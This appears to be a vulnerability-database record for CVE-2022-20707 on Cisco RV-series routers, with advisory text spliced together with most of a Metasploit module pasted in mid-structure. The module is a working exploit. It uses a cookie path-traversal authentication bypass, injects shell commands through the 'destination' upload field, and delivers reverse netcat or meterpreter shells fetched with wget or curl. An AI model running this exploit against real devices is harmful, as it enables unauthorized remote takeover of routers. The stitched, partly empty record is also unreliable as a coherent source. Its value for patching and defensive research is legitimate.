ID

VAR-202202-0322

CVE

CVE-2022-20707

TITLE

plural  Cisco Small Business RV  Series router out-of-bounds write vulnerability

DESCRIPTION

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the www-data user. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the configuration of the NGINX web server. When parsing the sessionid cookie, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to bypass authentication on the system. This access can then be used to pivot to other parts of the network. This module works on firmware versions 1.0.03.24 and below. }, 'License' => MSF_LICENSE, 'Platform' => ['linux', 'unix'], 'Author' => [ 'Biem Pham', # Vulnerability Discoveries 'Neterum', # Metasploit Module 'jbaines-r7' # Inspired from cisco_rv_series_authbypass_and_rce.rb ], 'DisclosureDate' => '2021-11-02', 'Arch' => [ARCH_CMD, ARCH_ARMLE], 'References' => [ ['CVE', '2022-20705'], # Authentication Bypass ['CVE', '2022-20707'], # Command Injection ['ZDI', '22-410'], # Authentication Bypass ['ZDI', '22-411'] # Command Injection ], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'Payload' => { 'BadChars' => '\'#' }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_ARMLE], 'Type' => :linux_dropper, 'Payload' => { 'BadChars' => '\'#' }, 'CmdStagerFlavor' => [ 'wget', 'curl' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'MeterpreterTryToFork' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path', '/']) ] ) end # sessionid utilized later needs to be set to length # of 16 or exploit will fail. Tested with lengths # 14-17 def generate_session_id return Rex::Text.rand_text_alphanumeric(16) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => '/upload', 'headers' => { 'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id } }, 10) # A proper "upload" will trigger file creation. So the send_request_cgi call # above is an incorrect "upload" call to avoid creating a file on disk. The router will return # status code 405 Not Allowed if authentication has been bypassed by the above request. # The firmware containing this authentication bypass also contains the command injection # vulnerability that will be abused during actual exploitation. Non-vulnerable # firmware versions will respond with 403 Forbidden. if res.nil? return CheckCode::Unknown('The device did not respond to request packet.') elsif res.code == 405 return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.') elsif res.code == 403 return CheckCode::Safe('The device is not vulnerable to exploitation.') else # Catch-all return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.') end end def execute_command(cmd, _opts = {}) res = send_exploit(cmd) # Successful unix_cmd shells should not produce a response. # However if a response is returned, check the status code and return # Failure::NotVulnerable if it is 403 Forbidden. if target['Type'] == :unix_cmd && res&.code == 403 fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable') end if target['Type'] == :linux_dropper fail_with(Failure::Unreachable, 'The target did not respond') unless res fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200 begin body_json = res.get_json_document fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json rescue JSON::ParserError => e print_error("Failed: #{e.class} - #{e.message}") fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!') end end print_good('Exploit successfully executed.') end def send_exploit(cmd) filename = Rex::Text.rand_text_alphanumeric(5..12) fileparam = Rex::Text.rand_text_alphanumeric(5..12) input = Rex::Text.rand_text_alphanumeric(5..12) # sessionid utilized later needs to be set to length # of 16 or exploit will fail. Tested with lengths # 14-17 sessionid = Rex::Text.rand_text_alphanumeric(16) filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues. pathparam = 'Configuration' destination = "'; " + cmd + ' #' multipart_form = Rex::MIME::Message.new multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"') multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"') multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"') multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"') multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"') multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename)) # Escaping "/tmp/upload/" folder that does not contain any other permanent files send_request_cgi({ 'method' => 'POST', 'uri' => '/upload', 'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}", 'headers' => { 'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid }, 'data' => multipart_form.to_s }, 10) end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager(linemax: 120) end end end

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

buffer error

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Bien Pham (@bienpnn) from Team Orca of Sea Security (security.sea.com)

SOURCES

LAST UPDATE DATE

2024-08-14T13:53:35.952000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE